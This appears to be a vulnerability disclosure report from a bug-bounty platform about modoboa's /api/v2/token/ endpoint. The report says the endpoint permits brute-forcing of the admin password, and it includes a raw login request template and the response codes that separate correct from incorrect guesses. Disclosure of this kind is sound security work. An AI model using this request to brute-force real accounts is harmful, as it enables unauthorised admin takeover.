Admin TakeOver in modoboa/modoboa
Valid
Reported on
Jan 26th 2023
Description
The endpoint /api/v2/token/ allows an unauthorized user to perform brute-forcing and the app doesn't block the request which not having any SESSION COOKIE or even CSRF token
Request
POST /api/v2/token/ HTTP/1.1
Host: demo.modoboa.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------25524418606542250161357131552
Content-Length: 301
Upgrade-Insecure-Requests: 1
Sec-Fetch-User: ?1
Sec-Gpc: 1
Te: trailers
Connection: close
-----------------------------25524418606542250161357131552
Content-Disposition: form-data; name="username"
admin
-----------------------------25524418606542250161357131552
Content-Disposition: form-data; name="password"
{PASSWORD-HERE}
-----------------------------25524418606542250161357131552--
This request returns 2 types of response codes.
--> HTTP/1.1 401 Unauthorized :: For Incorrect Password
--> HTTP/1.1 200 OK :: For Correct Password
Proof Of Concept
Impact
Admin Take Over
References
We are processing your report and will contact the
modoboa
team within 24 hours.
2 months ago
We have contacted a member of the
modoboa
team and are waiting to hear back
2 months ago
The researcher's credibility has increased: +7
The fix bounty has been dropped
This vulnerability has been assigned a CVE
@Maintainer @Admin
Is it possible to add here: https://github.com/modoboa/modoboa/security/advisories
to join this conversation